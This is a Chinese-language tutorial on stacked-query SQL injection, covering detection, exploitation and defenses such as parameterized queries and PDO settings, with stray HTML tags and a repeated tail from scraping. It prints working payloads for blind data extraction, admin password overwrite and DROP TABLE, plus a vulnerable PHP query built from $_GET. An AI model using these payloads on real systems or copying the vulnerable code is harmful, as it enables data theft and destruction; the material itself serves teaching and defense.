堆叠查询注入攻击与防御技术详解<\/h1>

一、堆叠查询注入概述<\/h2>
堆叠查询注入(Stacked Query Injection)是一种SQL注入技术，攻击者通过在输入中插入分号(`;<\/code>)来分隔多个SQL语句，从而在单次请求中执行多条SQL命令。<\/p>`

核心特点<\/h3>

允许在一个数据库连接中执行多个SQL语句<\/li>
语句之间使用分号(;<\/code>)分隔<\/li>
第二条及后续语句完全由攻击者控制<\/li>
特别危险因为可以执行任意数据库操作<\/li>
<\/ul>
二、堆叠查询注入原理<\/h2>
基本攻击模式<\/h3>

攻击者在输入中插入分号结束原始查询<\/li>
随后添加自定义的恶意SQL语句<\/li>
数据库服务器依次执行所有语句<\/li>
<\/ol>
示例攻击语句<\/h3>
'; SELECT IF(SUBSTR(USER(),1,1)='<\/span>r',SLEEP(3),1)%23
<\/span><\/span><\/span><\/code><\/pre>三、堆叠查询注入检测技术<\/h2>
检测步骤<\/h3>

错误检测<\/strong>：尝试输入id=1'<\/code>观察是否返回数据库错误<\/li>
注释验证<\/strong>：输入id=1'%23<\/code>验证注释是否生效<\/li>
多语句测试<\/strong>：尝试执行简单堆叠查询如id=1'; SELECT 1%23<\/code><\/li>
<\/ol>
时间注入检测<\/h3>
'; SELECT IF(SUBSTR(USER(),1,1)='<\/span>r',SLEEP(3),1)%23
<\/span><\/span><\/span><\/code><\/pre>
如果第一个字符是'r'则延迟3秒<\/li>
否则立即返回<\/li>
<\/ul>
四、堆叠查询注入利用技术<\/h2>
1. 数据库信息收集<\/h3>
获取当前用户<\/strong>：<\/p>
'; SELECT IF(SUBSTR(USER(),1,1)='<\/span>r',SLEEP(3),1)%23
<\/span><\/span><\/span><\/code><\/pre>获取表名<\/strong>：<\/p>
'; SELECT IF(SUBSTR((SELECT TABLE_NAME FROM information_schema.tables 
<\/span><\/span><\/span>WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1),1,1)='<\/span>u',SLEEP(3),1)%23
<\/span><\/span><\/span><\/code><\/pre>2. 数据提取技术<\/h3>
通过布尔型或时间盲注逐字符提取数据：<\/p>
'; SELECT IF(ASCII(SUBSTR((SELECT password FROM users LIMIT 0,1),1,1))=97,SLEEP(3),1)%23
<\/span><\/span><\/span><\/code><\/pre>3. 直接数据操作<\/h3>
'; UPDATE users SET password='<\/span>hacked' WHERE username='<\/span>admin<\/span>'%23
<\/span><\/span><\/span>'<\/span>; DROP<\/span> TABLE<\/span> users%<\/span>23<\/span>
<\/span><\/span><\/code><\/pre>五、PDO环境下的堆叠注入<\/h2>
PDO配置问题<\/h3>
即使使用PDO，如果直接将用户输入拼接到SQL语句中，仍然存在注入风险：<\/p>
$conn =<\/span> new<\/span> PDO<\/span>("mysql:host=localhost;dbname=test"<\/span>, "root"<\/span>, "123456"<\/span>);
<\/span><\/span>$stmt =<\/span> $conn-><\/span>query<\/span>("SELECT * FROM users where `id`='"<\/span>.<\/span>$_GET['id'<\/span>].<\/span>"'"<\/span>);
<\/span><\/span><\/code><\/pre>PDO堆叠注入特点<\/h3>

PDO默认只返回第一条语句的结果<\/li>
但后续语句仍会被执行<\/li>
可利用时间注入或数据修改操作<\/li>
<\/ul>
六、防御措施<\/h2>
1. 参数化查询<\/h3>
$stmt =<\/span> $conn-><\/span>prepare<\/span>("SELECT * FROM users WHERE id = ?"<\/span>);
<\/span><\/span>$stmt-><\/span>execute<\/span>([$_GET['id'<\/span>]]);
<\/span><\/span><\/code><\/pre>2. 输入验证<\/h3>

白名单验证输入格式<\/li>
对于数字ID，强制转换为整数<\/li>
<\/ul>
3. 最小权限原则<\/h3>

数据库用户只授予必要权限<\/li>
禁止普通用户执行DDL语句<\/li>
<\/ul>
4. PDO安全配置<\/h3>
$conn-><\/span>setAttribute<\/span>(PDO<\/span>::<\/span>ATTR_EMULATE_PREPARES<\/span>, false<\/span>);
<\/span><\/span>$conn-><\/span>setAttribute<\/span>(PDO<\/span>::<\/span>ATTR_ERRMODE<\/span>, PDO<\/span>::<\/span>ERRMODE_EXCEPTION<\/span>);
<\/span><\/span><\/code><\/pre>5. 其他防御<\/h3>

Web应用防火墙(WAF)<\/li>
数据库防火墙<\/li>
定期安全审计<\/li>
<\/ul>
七、总结<\/h2>
堆叠查询注入是一种高危SQL注入技术，允许攻击者在单次请求中执行多条SQL语句。防御的关键在于：<\/p>

始终使用参数化查询<\/li>
不要拼接用户输入到SQL语句<\/li>
实施深度防御策略<\/li>
定期进行安全测试<\/li>
<\/ol>
通过正确使用预处理语句和严格的输入验证，可以完全防止堆叠查询注入攻击。<\/p>

堆叠查询注入攻击与防御技术详解<\/h1>

一、堆叠查询注入概述<\/h2> 堆叠查询注入(Stacked Query Injection)是一种SQL注入技术，攻击者通过在输入中插入分号(;<\/code>)来分隔多个SQL语句，从而在单次请求中执行多条SQL命令。<\/p>

二、堆叠查询注入原理<\/h2>

三、堆叠查询注入检测技术<\/h2>

四、堆叠查询注入利用技术<\/h2>

五、PDO环境下的堆叠注入<\/h2>

六、防御措施<\/h2>

一、堆叠查询注入概述<\/h2>
堆叠查询注入(Stacked Query Injection)是一种SQL注入技术，攻击者通过在输入中插入分号(`;<\/code>)来分隔多个SQL语句，从而在单次请求中执行多条SQL命令。<\/p>`